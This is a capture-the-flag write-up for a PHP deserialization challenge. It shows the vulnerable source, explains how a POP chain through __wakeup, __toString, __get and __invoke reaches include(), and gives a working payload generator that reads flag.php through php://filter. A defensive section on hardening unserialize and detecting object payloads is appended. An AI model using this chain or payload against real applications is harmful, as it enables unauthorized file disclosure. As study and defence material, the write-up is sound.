阿新 • Published: 2022-05-10
The challenge page prints `Welcome to index.php` and then the highlighted source:

```php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected $var;
    public function append($value){
        include($value);   // file-inclusion sink reached at the end of the chain
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
```
Magic methods used in this challenge

- `__construct`: called when an object is created.
- `__toString`: called when an object is used as a string.
- `__wakeup()`: triggered when the object is restored by `unserialize`.
- `__get()`: called when reading an inaccessible property. Inaccessible here means (1) a private or protected property, or (2) a property that is not defined or not initialized on the object.
- `__invoke()`: triggered when the script tries to call an object as a function.
Constructing the POP chain

First, `unserialize` triggers `Show::__wakeup`. `__wakeup` runs `preg_match` on `$this->source`, so if `source` holds another `Show` object, the string conversion calls that object's `__toString`, which returns `$this->str->source`. If `str` is a `Test` instance, which has no `source` property, `Test::__get` is called; with `p` set to a `Modifier` instance, the call `$function()` triggers `Modifier::__invoke`, which finally reaches the file-inclusion function and reads `flag.php`.
Payload

```php
<?php
class Modifier {
    // php://filter with base64 makes include() return the file contents
    // instead of executing flag.php
    protected $var = 'php://filter/convert.base64-encode/resource=flag.php';
}
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
    }
}
class Test{
    public $p;
}
$b = new Show();
$b->str = new Test();
$b->str->p = new Modifier;
$a = new Show($b);
// urlencode is needed: the protected property name serializes with \0 bytes
echo urlencode(serialize($a));
?>
```
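The chain above only works because `unserialize()` instantiates whatever classes the attacker names, so their magic methods run. The following is an added example (not part of the challenge or this writeup) showing how the same endpoint can be hardened and how such a payload can be flagged. It assumes PHP 7.3 or newer; the class layout of the constructed sample mirrors the chain in the writeup, and the `Modifier` value inside it is a harmless placeholder string.

```php
<?php
// Added example: defensive handling of untrusted serialized input.

// 1. Disable class instantiation. With allowed_classes => false every
//    object in the payload becomes __PHP_Incomplete_Class, so __wakeup,
//    __toString, __get and __invoke never run and a POP chain cannot start.
function safe_unserialize(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

// 2. First-pass detection: object notation ('O:' or 'C:' followed by a
//    name length) is what a chain needs; plain data only uses i:, s:, a:,
//    b:, d: and N;. A string value could also contain these characters,
//    so treat a hit as a reason to log and reject, not as a full parse.
function looks_like_object_payload(string $data): bool
{
    return (bool) preg_match('/(^|[{;])[OC]:\d+:"/', $data);
}

// 3. Preferred fix: carry user state in a format with no object semantics.
function decode_state(string $data): array
{
    $decoded = json_decode($data, true, 16, JSON_THROW_ON_ERROR);
    if (!is_array($decoded)) {
        throw new InvalidArgumentException('state must be a JSON object or array');
    }
    return $decoded;
}

// Constructed sample in the shape Show -> Show -> Test -> Modifier.
// "\0*\0var" is how PHP serializes the protected property name.
$constructed = 'O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";s:9:"index.php";'
    . 's:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"' . "\0*\0var" . '";'
    . 's:11:"placeholder";}}}s:3:"str";N;}';

if (looks_like_object_payload($constructed)) {
    // Log and refuse; the truncated prefix is enough for triage.
    error_log('[pop-detect] object notation in untrusted input: '
        . substr(str_replace("\0", '\0', $constructed), 0, 60));
}

// Even if the data is passed on, nothing is instantiated.
$obj = safe_unserialize($constructed);
var_dump($obj instanceof __PHP_Incomplete_Class);
var_dump(get_class($obj));

// The JSON path accepts only data.
var_dump(decode_state('{"source":"index.php"}'));
```

Note that `allowed_classes => false` is a containment measure: the returned incomplete objects still must not be passed back into `serialize()`/`unserialize()` elsewhere with classes enabled. Moving the state format to JSON removes the object graph entirely, which is the durable fix.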